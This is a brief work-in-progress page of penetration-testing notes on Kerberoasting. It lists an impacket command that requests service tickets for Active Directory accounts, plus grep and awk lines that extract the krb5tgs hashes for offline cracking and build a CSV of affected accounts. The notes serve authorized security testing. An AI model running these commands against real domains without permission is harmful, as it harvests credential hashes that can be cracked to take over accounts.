🕐Kerberoasting

This page is currently a work in progress

Kerberoast Affected SPNs (NTLM)

impacket-GetUserSPNs -request -save $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER | tee GetUserSPN-Output.txt

Get only tickets for cracking

cat GetUserSPN-Output.txt | grep "krb5tgs" >> kerb.hash

Create affected SPN CSV

cat GetUserSPN-Output.txt | grep 'CN=' | awk -F' ' 'NR==1{print "SPN,Username"};{print $1","$2}' >> Kerberoastable-User-Account.csv

The above may miss SPNs when there is no "MemberOf" field in the SPN (I have seen this on a test before). Also, if you have two identical SPNs where one has the port at the end and the other does not, both will be reported.

Last updated